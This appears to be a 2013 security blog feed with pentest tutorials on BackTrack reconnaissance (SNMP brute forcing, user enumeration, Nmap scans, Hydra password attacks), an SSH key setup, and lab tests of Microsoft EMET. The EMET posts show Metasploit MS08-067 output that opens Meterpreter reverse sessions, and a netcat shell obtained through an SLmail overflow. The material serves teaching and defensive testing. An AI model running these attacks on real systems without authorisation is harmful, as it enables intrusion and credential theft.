Backtrack – GoSecure!

Penetration Test – Ghatering Phase. [Part 2]

Peru — Tue, 13 Aug 2013 07:59:54 +0000

This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so If you are interested on it you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 2 following links. The only thing you need is a free registration.
– PenTest Extra Compendium
– Hakin9 Starter kit.
– PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 2]

Find your account
As for the hosts, users discovering can be done using many methods. You can scan Google searching for email accounts of your target company, explore corporate Web pages looking at pdf or word documents and who are the creators of this documents; if you have access to the LAN you are testing, you can try to get information from SNMP or SMTP protocol. Below are some scripts and programs that will help you, present in BT.
The harvest, by Edge-Security Research, is a very useful one. It searches for a company name in various resources database (Google, Linkedin, PGP, Bing) and can be used to extract probable username. In Figure 5 you can see the result of a research: maybe vdiaz, cdelojo, cmartorella, and xmendez are also FTP, SSH or RDP users.
Again by Edge-Security.com, you can use metagoofil (/pentest/enumeration/google/metagoofil/) to try to find users that create documents, downloadable from the domain you point at, such as docs or pdfs.

Figure 5

As well as using Web search to catch company users’ names/usernames, you can try to obtain information by SNMP or SMTP.
SNMP is a protocol based on UTP that is often used to monitor server service status. The authentication methods (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to get many information.
You can use programs such Snmpenum and Onesixtyone for this. Let’s see how they work.
Initially you have to use Onesixtyone to enumerate comunity strings; with the info collected before, make a list of hosts and write it down to a file (/tmp/hosts.txt), then point to pentest/enumeration/snmp/onesixtyone and do the following:

root@bt:pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt -i /tmp/hosts.txt -o /tmp/log.txt

In this command you use a file dict.txt, already present in the onesixtyone folder, to ‘brute force’ the community strings; you use the hosts file you have found before to set targets and, at the end, make a log file.
In Figure 6 you can find a sample of what you can get. In the sample you see some printers, some switches and a server (192.168.1.10).

Figure 6

Go on and use snmpenum over 192.168.1.10 setting ‘public’ as community string, and the windows.txt template (already present) to merge output information (see Figure 7).

Figure 7

This is just a sample, but you can get much more information than these using SNMP. You can find processes running, opened ports, system information and much more.
For now, limit yourself to the users. What you want is to create a document like hosts.txt but with possible user names.
There are many other methods to identify users such as using SMTP server (smtpscan) and try to test the VRFY functionality (smtp-user-enum). Spidering a target website to collect unique words (/pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the Backtrack > Information Gathering > Network analysis menu you can find many tools to reach your target. Try to find as many names as you can, but do not forget to add to your list the most common user names (root, admin, administrator).

Map the NET
Let’s have a look at network scanners, limiting us to a simple scan, with the only objective to find some services that can be used as a target.
Please, make sure to keep in mind that scanners are much more than what you will read here.
Of course, NC can be used as a network scanner, but the best programs are Unicorscan and Nmap so let’s start with the first one. The commands in Figure 8 perform a simple scan, pointing at a single target (192.168.34.135), testing common TCP (-m T) and UTP (-m U) ports, typically those used by common services such as FTP, SSH, SMB, MySQL. The last command in Figure 8 is a scan of all the subnet 192.168.34.*, but only on FTP, SSH, SMB, and RDP ports.

Figure 8

You can perform the same thing using Nmap. The command nmap 192.168.34.135 scans TCP common port; if you add -sU option it will scan UDP ports. The single target can be replaced with 192.168.34.*, 192.164.34.0/24 or your hosts.txt to explore all subnet or specific IPs; adding the option
-p 21-23,3389 you will limit the scan to port 21, 22, 23 and 3389. The result will be probably the same but if you try Nmap you will see more information. In addition, it can be quickly implemented to determinate what kind of program is listening over the port discovered (-sV) and what operating system is installed (-O). Please, take a look at the Nmap help to learn more options and remember that man command or help are always your friends. If you are afraid to use the Terminal, use the Nmap GUI: Zenmap.
You have to remember that every GUI is at least one layer over its command-line program; anyway let’s use the graphic interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9).
Scanners make a list of hosts using FTP, another one of hosts using RDP, and so on.

Figure 9

Get the Keys
Well done! You have completed your basic network gathering phase, now you can merge all your lists and launch your first attack. What do you need? A username list, a file listing hosts with the specific service, a password list, and a program to put everything together. You don’t have the password list, but one can be easily found in the folder /pentest/password/wordlist/ or by a search on the Web. The kind of attack you will do is called ‘wordlist attack’: it is not the most elegant way to perform a penetration test, but it may be very incisive.
The program you can use to join your lists is Hydra (or its GUI xHydra). Figure 10 explains how it works.
Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > Hydra-gtk)
and, in the Target tab, insert the target list (e.g.FTP_hosts.txt), the port to test and the protocol (21 / FTP).

Figure 10

The options ‘Show attempts’ and ‘Be verbose’ are useful to better understand what the program does. Go in the Password tab and insert the user and the password lists; don’t forget to check ‘try login as password’ and ‘try empty password’. For a basic test don’t use Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I Hope you can find some user and password association.
You can also try to extend your lists to have more chances, but remember that such attack may take a very long time. In a pen test you must have a very strong reason to spend 8 or more hours for a word list attack.
Anyway, if you find some associations, write them down and be ready to reuse it: users are used to use the same password for more than one service.
You can start to write a file with user:password, you will use it on Hydra in the Password tab instead of users and passwords lists. When you discover a new service, you can first use Hydra with the new file created and then the lists of users and passwords. This will speed up your work.

I hope you now have the user/password to access the FTP, SMB or, if you are lucky, the SSH, or RDP.
This is not the end of the test, this is the beginning. You will use this access to gain more information and to find more vulnerability all over the LAN.
But what about if you can’t find anything? Don’t worry, these are just the first arrows in your quiver. After these, you can try many other things such as web vectors, exploit some vulnerability, or ARP poissoning. There are so many options that the only limit is you and every discovery is the start for the next one.

So when you open a new port, restart from the beginning, restart from sharpenning your axe.

Penetration Test – Ghatering Phase. [Part 1]

Peru — Tue, 23 Jul 2013 13:17:57 +0000

This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so If you are interested on it you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 3 following links. The only thing you need is a free registration.
–   PenTest Extra Compendium
–   Hakin9 Starter kit.
–   PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 1]

Abraham Lincoln said ‘Give me six hours to chop down a tree and I will spend the first four sharpening the axe’. This is really the basic concept and the start point of every penetration test.

In a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more surface to attack you will have. The gathering phase isn’t the most exciting one, but surely it is the one that will let you make things better and smarter. So what do you need? Let’s see.
First, you need an adequate system with the right toolkit and a little knowledge of how they work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread operating system, so it will be quite simple to get support or tutorials on the Web: Youtube has a video for almost all the BT tools.
The best way to start with BT is virtualization: you can download its virtual machine ready to be started. In addition, using virtualization, you can easily start a cheap and smart LAB to perform your tests. If you already have a test network, you can also use the bootable CD.

Next you have to be calm and patient, only this way you can collect information and inspect them rightly. You can make your own check-list of tests to do or copy one from the Web, but, when you have your list, you have to follow it meticulously. Remember that you are sharpening.

Now you need to write down all the data you collected in order to have everything recorded so that you can analyze it even when you aren’t connected to the LAN you have to test. Furthermore you will use these records to make a detailed report for your customer or to roll back in case you mess something up.
I use Keepnote to keep track of all my operations and results and Zenmap (Nmap GUI) to map the net, but BT has many more powerful tools than these. Maltego, for example, is awesome.

My friend Netcat
Now let’s start to use the father of all tools, the famous ‘Swiss-army knife for TCP/IP: Netcat‘. Essentially, NC, is a utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
So why is it so important? When a PC user without experience wants to test if his machine is browsing the Internet, he opens his browser and points to a common address: www.google.com.
This is not the best test he could do, he only finds out if he is browsing, but what about if he is not browsing? So the approach must be different. He has to start from a layer closer to the PC, not closer to the user, and investigate the causes, step by step, up to the human layer.
You are not an inexperienced person, so you start by opening a command shell and pinging your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. 8.8.8.8 that is the Google DNS). Is it responding? Alright, you are able to go out of your network. Next you test if your DNS is working by pinging a DNS name like www.google.com. Only if all works fine, you open your browser and test the connection. Also, from the browser you can have a problem (e.g. a misconfigured proxy set in the browser) but, after all the tests you have done previously, you can rule out all lower layers and focus on the current one.
That’s why NC is so important. It allow you to start from the lowest layer, it is the equivalent of the ping command used in the example, but it has many more applications.

Well, open your Terminal window and have a look at the NC help.

root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

At the beginning you will use options -l(set NC in listening mode), -v (verbose mode is always better) and -p (set port where NC is listening).Try this:
Open two Terminal windows in the same machine. In the first window start a service that listens
on a specific port using Netcat (it is called the listener).

root@bt:~# nc -lvp 4444

If you have a look at the network connection of your BT machine, using the command netstat -nat, you will find a listening connection on port 4444 (tcp 0.0.0.0:4444 LISTEN).
In the second window use NC as a client and connect to localhost on port 4444

root@bt:~# nc 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially, it is a simple chat. If you write something in window 1, it will redirect to windows 2 andvice versa (see Figure 1).

Figure 1

So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.
If you have two PCs try to use NC between them or just continue the testing in the same machine (that is the lower layer).
For example, you can try to pass text:

root@bt:~# echo 'This text will be transmitted using Netcat'| nc 127.0.0.1 4444

…and if the listener is as the following, you can also
create a file with the text sent:

root@bt:~# nc -lvp 4444 > file.txt

You can also try the -c option for remote administration.
I suggest you to dig the Internet to search more about Netcat use.

Network hosts identification
As I said, finding information about the target is the base of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, create your own hosts individuation scripts using ping and NC or use some of the wonderful tools present in BT. In my opinion, the best are Unicornscan and Nmap, but, since I will shortly explain them later, let’s explore some other programs with less possibility, but working as well.
Start using netdiscover to find live hosts. Using netdiscover -P a network scan is started using common LAN address (the one you are connected to) (see Figure 2).
Netdiscover can be also used on another network interface (-i) and IP range (-r). The -P option is useful for a better output. Netdiscover is a continuing scan tool: it scans over and over the net in order to find new hosts and it could be used to
implement a very simple intrusion detection system. To stop the scan you have to use [CTRL+C].
In a similar way you can use fping with option -g to analyze a range of IPs. Note that fping uses ICMP protocol, whereas netdiscover uses ARP protocol to locate network hosts – this is a good double check.

Figure 2

Don’t forget to write down everything and trace all. Particularly start to compile a list of live hosts. You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program can find only a few, those with net bios name enable.
Let’s now try to find something more using DNS discovering. If you are in a domain or if you are scanning for DNS name in the Web, you can try to operate a DNS zone transfer and capture DNS records.
When you can perform this operation, you get other sensible information and, maybe, hosts not previously discovered.
The DNS transfer zone is a query that synchronizes Primary and Secondary DNS servers but if administrators misconfigure them, everyone can query for transfer and get all DNS records. DNSenum is a tool that tries to make a zone transfer and catch the results. The basic operation is quite simple: you just have to set the domain name to target.
Note that you can try the zone transfer both on a local (see Figure 3) or an Internet domain (see Figure 4).
You have to notice that a DNS zone transfer, even if successfully done, does not give hackers a direct access to the servers, but gives them many information that can be useful to expand the attack surface. Look at Figure 4; the DNS transfer zone highlights at least 3 attack vectors: webmail, ftp, sftp.

Figure 3

Figure 4

It is therefore essential to block all the attacks and scans you can. Also ARP and ICMP scans must be stopped in a protected LAN. Unfortunately this isn’t always practicable: in a Microsoft domain, for example, some administrative system tools do not work with restrictive local firewall policies.
It is not easy to find balance between security and efficiency.

You have done a good hosts analysis and you have a list of IPs alive in the network. Now you can start user account identification.

[end of part 1]

You can find other NetCat info in this post

Setting up a ssh server on Kali linux

Peru — Mon, 15 Jul 2013 22:46:35 +0000

Environment:
The SSH server is a Kali Linux (hostname:kali ip:10.0.0.3)
The SSH client is a Backtrack (hostname:bt ip:10.0.0.2)

Configuration:
On the Kali distribution the ssh server is already installed so I have only to start it; I can do it using the menu Applications > Kali Linux > System Services > SSH > sshd start
After that I can immediatly connect from client using the user autentication

root@bt:~# ssh root@10.0.0.3
root@10.0.0.3's password:
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Ofcourse I want to secure the SSH server, so I stop the service and I will setup SSH to use an RSA authentication.
On server I create the keys using ssh-keygen command; this will create 2 keys:
– Public key, resident on the server, in my case it is called id_rsa.pub
– Privare key, used by the client, called id_rsa

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
eb:63:b6:89:a3:74:dd:76:9f:ea:7f:1e:d4:d4:ba:9b root@kali
The key's randomart image is:
+--[ RSA 2048]----+
| |
| .|
| o|
| o.|
| S ...|
| . o .. |
| . . o o . .. |
| . ..o+o . . +o|
| ...++o .ooEo.|
+-----------------+

As I said, the private key, has to be transferred on the client. I start a Netcat listener on machine called bt

root@bt:~# nc -lp 4444 > id_rsa

On the server, the Kali machine, I connect to the listener and transfer the key

root@kali:~# nc -w 1 10.0.0.2 4444 < /root/.ssh/id_rsa

Note that NC file transfert is not a secure way to pass the key. That is why NC isn’t an encrypted channel. I use this method because I am in a lab/test environment.

On server I have to edit the file /etc/ssh/sshd_config to allow RSA authentication.

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile %h/.ssh/authorized_keys

Is a good idea to remove user autentication too

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

I save the file and restart the service.
The last server operation is to add the id_rsa.pub key on the file indicated on sshd_config in the field AuthorizedKeysFile

root@kali:~# cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

Note that I have to add the key (>>) to the file, not to overwrite it (>), since I can have more than one publik key stored in the same file.

I move on the client and give the right permission to id_rsa (chmod 600 id_rsa). I am not used to store private keys on the default folder, but I prefer to store it in an encrypted folder and then to use the -i option of the ssh client.

Ok, let’s try the access using my new RSA key

root@bt:~# ssh root@10.0.0.3 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Remember that is good:
– To store your private keys in a protected place
– To create keys with strong password
– To hardening sshd_config (eg. disable root access)
– To take a look at the auth file log (/var/log/auth.log)

EMETv4 – Part 2

Peru — Mon, 24 Jun 2013 14:50:14 +0000

[begin of phase 2] Take a look at the [phase 1]

I continue my tests about EMETv4. This time I’ve installed EMETv4 on the same machine HP-CLI01 and HP-SRV01 (note that framework 4 is required ). The only configuration I set is the “recommended” one.

Test4
Target: Windows Server 2003 SP2 eng; Host Name: HP-SRV01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit
EMET agent: installed with recommended settings.

This is MSFConsolle ouput of the exploit:

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 16002
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

Provided by:
hdm
Brett Moore
staylor
jduck

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.132:33899 -> 192.168.34.135:1091) at 2013-06-19 20:11:50 +0200

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
268 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
316 268 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
340 268 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
388 340 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
400 340 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
568 388 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
588 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
760 388 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
816 388 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
872 388 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
888 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1160 888 wmiadap.exe x86 0 NT AUTHORITY\SYSTEM \\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE
1164 388 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1200 388 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
1284 388 cisvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\cisvc.exe
1344 388 dfssvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\Dfssvc.exe
1376 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1460 388 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1480 388 ismserv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\ismserv.exe
1500 388 ntfrs.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ntfrs.exe
1624 388 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1664 388 SLadmin.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLadmin\SLadmin.exe
1788 388 SLSmtp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\slsmtp.exe
1848 388 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1876 388 tcpsvcs.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tcpsvcs.exe
1964 388 SLMail.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\SLmail.exe
2104 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2336 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
2404 388 TPAutoConnSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2464 388 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
2612 388 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2644 588 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2824 388 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
3060 588 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
3380 3352 explorer.exe x86 0 HP\Administrator C:\WINDOWS\Explorer.EXE
3444 2404 TPAutoConnect.exe x86 0 HP\Administrator C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
3488 3380 vmtoolsd.exe x86 0 HP\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3596 388 msiexec.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe
3924 888 wuauclt.exe x86 0 HP\Administrator C:\WINDOWS\system32\wuauclt.exe
4016 3560 EMET_Agent.exe x86 0 HP\Administrator C:\Program Files\EMET 4.0\EMET_Agent.exe

meterpreter > sysinfo
Computer : HP-SRV01
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

The target is powned. Take a look at the process number 4016: 4016 3560 EMET_Agent.exe
The EMET_Agent is running but the exploit still works.

Test 5
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit
EMET agent: installed with recommended settings.

I setup the exploit exactly as test 2 but this time EMET works well and stops me.
When I start IE6 on the target machine and point to the evil page the aurora exploit cause the crash of Internet Exploter as wished. so I restart the target machine and retry: same result, IE6 crash. I want to double check this and I exclude iexplorer.exe from EMEC configuration and this time the exploit has worked.

This is a drow: exploit 1 – EMEC 1.

Test 6
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit
EMET agent: installed with recommended settings.

Also in this case, with defaul settings the exploit works:

root@bt:~# nc 192.168.34.134 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>tasklist
tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 540 Console 0 388 K
csrss.exe 604 Console 0 4,172 K
winlogon.exe 628 Console 0 5,032 K
services.exe 672 Console 0 3,348 K
lsass.exe 684 Console 0 1,532 K
vmacthlp.exe 844 Console 0 2,328 K
svchost.exe 860 Console 0 4,860 K
svchost.exe 944 Console 0 4,348 K
svchost.exe 1036 Console 0 18,140 K
svchost.exe 1092 Console 0 3,340 K
svchost.exe 1224 Console 0 4,236 K
spoolsv.exe 1536 Console 0 5,568 K
explorer.exe 1556 Console 0 18,664 K
vmtoolsd.exe 1688 Console 0 13,560 K
SLadmin.exe 2020 Console 0 3,076 K
SLSmtp.exe 272 Console 0 4,720 K
vmtoolsd.exe 324 Console 0 11,396 K
TPAutoConnSvc.exe 312 Console 0 3,868 K
wscntfy.exe 1368 Console 0 1,964 K
alg.exe 1816 Console 0 3,416 K
TPAutoConnect.exe 2448 Console 0 4,048 K
wuauclt.exe 3200 Console 0 5,048 K
SLMail.exe 564 Console 0 4,940 K
msiexec.exe 3768 Console 0 8,256 K
EMET_Agent.exe 3752 Console 0 27,960 K
cmd.exe 3988 Console 0 2,432 K
tasklist.exe 3980 Console 0 4,076 K
wmiprvse.exe 1628 Console 0 5,528 K

C:\Program Files\SLmail\System>hostname
hostname
hp-cli01

C:\Program Files\SLmail\System>ipconfig | findstr Address ipconfig | findstr Address
IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Program Files\SLmail\System>

Again, after a reboot, EMET doesn’t stop the attack, so I try to adjust some settings. If I modify the profile template from “recommended” to “maximum” and reboot, EMET doesn’t allow the execution of code: the DEP block the execution from the address space. I double check it and retry my attack with basic settings: the exploit is not stopped. Also in this case let’s take 2 steps back and debug the application while EMET is blocking the execution (Image1)

Image 1

The overflow works, writing “A” up to the overwriting of the EIP but when it has to execute the payload it is stopped with message “Access violanion when executing 01C7A154”. That is actualy the address where my payload start to be executed.

Conclusions
I consider the EMET idea extremly useful and I think that this program, if implemented, will be able to increase the system security. Nowaday the bigest problems, from my viewpoint, are:
– not all moules are present and activated (SEHOP e ASLR)
– not all installed programs are controlled by default
– On my tests, on Windows XP, I have a problem with the EMET_agent when start the GUI (image2) and when I reboot (image3).
– I would be happier if FrameWork4 is not a requirement.

Image 2

Image 3

In this situation I will never install this program on a production server, but I will surely follow it, waiting for its evolutions.

EMETv4 – Part 1

Peru — Thu, 20 Jun 2013 12:00:56 +0000

The theory
Microsoft has relased the full edition of the free software EMETv4 “Enhanced Mitigation Experience Toolkit”. The Company puts together some tecnologies such ASLR and DEP to mitigate the risk of system hacking; first of all the “Zero day” attacks. This, thanks to DEP and ASLR, will not only patch Microsoft software, but all software installed. The DEP (Data Execution Prevention) is a technology that associates services or applications to non-executable memory region and blocks code executions from this area (buffer overflow). The ASLR (Address space layout randomization) randomize the address that the application use. If someone bypass the buffer overflow protection and write a script to exploit it, the return address he has to overwrite in the instruction pointer register (EIP or RIP) to redirect the exploit to the payload, is everytime different. This makes considerably more difficult the replica of the exploit.
Well, this is what I understand…therefore there is no other options, I have to test it.

The practice
I will test 3 attacks:
– To Operating system vulnerability (SMB)
– To Microsoft software (IE6)
– To non Microsoft Software (SLMail)

Target machines:
– Windows XP SP3 eng (Host Name: HP-CLI01; IP Address: 192.168.34.134)
– Windows Server 2003 SP2 eng (Host Name: HP-Srv01; IP Address: 192.168.34.135)

Attack machine:
– Linux BackTrack 5R2 (Host Name: bt; IP Address: 192.168.34.132)

Note that both Operating systems and vulnerability are rather old. I use these because I hope that EMET will work well on known exploits, better than with unknown one. So let’s start the phase 1: system without EMETv4.

Test 1
Target: Windows Server 2003 SP2 eng; Host Name: HP-Srv01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit

Look at the Metasploit Framework Consolle running on Linux machine:

msf exploit(ms08_067_netapi) > info

Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 16002
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great

Provided by:
hdm
Brett Moore
staylor
jduck

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.135 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 8 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

References:
https://cvedetails.com/cve/2008-4250/
https://www.osvdb.org/49243
https://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
https://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 2 opened (192.168.34.132:33899 -> 192.168.34.135:1089) at 2013-06-18 16:23:06 +0200

meterpreter > shell
Process 3792 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>systeminfo
systeminfo

Host Name: HP-SRV01
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Uniprocessor Free
Registered Owner: hp
Registered Organization: hp
Product ID: 69713-650-3699384-45501
Original Install Date: 1/20/2013, 12:26:37 AM
System Up Time: 0 Days, 0 Hours, 6 Minutes, 5 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 37 Stepping 5 GenuineIntel ~3466 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna
Total Physical Memory: 511 MB
Available Physical Memory: 305 MB
Page File: Max Size: 1,044 MB
Page File: Available: 844 MB
Page File: In Use: 200 MB
